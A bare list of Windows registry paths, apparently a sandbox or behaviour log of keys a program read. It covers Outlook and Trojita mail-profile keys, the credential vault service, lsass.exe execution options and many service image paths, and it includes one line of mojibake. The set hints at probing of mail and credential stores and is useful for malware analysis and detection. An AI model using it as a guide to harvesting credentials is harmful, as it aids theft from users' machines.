HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
HKEY_CURRENT_USER\SOFTWARE\flaska.net\trojita
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanWorkstation\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x81\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x89\xef\xbf\xbd\xef\xbf\xbd\xd0\x9d\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xef\xbf\xbd\xd0\x99\xef\xbf\xbd\xef\xbf\xbd\xd1\x8f\xef\xbf\xbd\xef\xbf\xbd
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_USERS\S-1-5-18
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Appinfo\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppMgmt\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AxInstSV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\IPBusEnum\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetMsmqActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetPipeActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpActivator\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetTcpPortSharing\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2pimsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\p2psvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PeerDistSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pla\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPAutoReg\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\PNRPsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ProtectedStorage\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasAuto\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RasMan\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteRegistry\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCPolicySvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\seclogon\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SessionEnv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SharedAccess\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64
HKEY_USERS\S-1-5-19
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-19\Environment
HKEY_USERS\S-1-5-19\Volatile Environment
HKEY_USERS\S-1-5-19\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start
